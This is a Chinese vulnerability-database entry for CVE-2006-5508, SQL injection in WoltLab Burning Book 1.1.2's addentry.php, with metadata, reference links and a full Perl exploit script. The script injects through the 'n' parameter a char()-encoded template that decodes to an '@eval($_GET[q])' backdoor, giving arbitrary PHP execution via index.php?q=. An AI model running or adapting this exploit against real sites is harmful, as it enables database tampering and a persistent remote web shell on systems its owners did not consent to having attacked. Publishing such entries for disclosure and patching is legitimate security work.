WoltLab Burning Book 'addentry.php' 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111301 漏洞类型 SQL注入
发布时间 2006-10-16 更新时间 2006-10-25
CVE编号 CVE-2006-5508 CNNVD-ID CNNVD-200610-420
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2579
https://www.securityfocus.com/bid/83620
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-420
|漏洞详情
WoltLabBurningBook1.1.2的addentry.php中存在多个SQL注入漏洞,远程攻击者可以通过(1)n参数和(2)User-AgentHTTP报头执行任意SQL命令。
|漏洞EXP
#!/usr/bin/perl

# woltlab.de burning book <=1.1.2 SQL and PHP injection PoC
# use /index.php?q=phpinfo();exit;
# ShAnKaR sec[A]shankar.antichat.ru
# http://antichat.ru/

use LWP;
die("use ./burn-book.pl http://localhost/wbbook/ [1(number book db, default `1`)]\n") if !$ARGV[0];$ARGV[1]='' if !$ARGV[1];
my $ua=LWP::UserAgent->new();
$ua->post($ARGV[0].'/addentry.php',[reg_image=>0,send=>'send',name=>1,message=>1,
n=>$ARGV[1].'_templates (`templateid`,`templatename`,`template`) VALUES (char(55,55,55),char(105,110,100,101,120,95,102,105,101,108,100,115),char(92,34,59,64,101,118,97,108,40,36,95,71,69,84,91,113,93,41,59,36,102,105,101,108,100,115,61,92,34,60,98,114,32,47,62,60,117,62,36,102,105,101,108,100,116,105,116,108,101,60,47,117,62,58,32,36,102,105,101,108,100))/*',]);

# milw0rm.com [2006-10-16]
|受影响的产品
Woltlab Burning Book 1.1.2
|参考资料

来源:BUGTRAQ
名称:20061016:ShAnKaR:WoltLabBurningBook<=1.1.2multiplevulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/448796/100/100/threaded
来源:MISC
链接:http://www.security.nnov.ru/Odocument711.html
来源:VUPEN
名称:ADV-2006-4062
链接:http://www.frsirt.com/english/advisories/2006/4062
来源:SREASON
名称:1774
链接:http://securityreason.com/securityalert/1774
来源:SECUNIA
名称:22442
链接:http://secunia.com/advisories/22442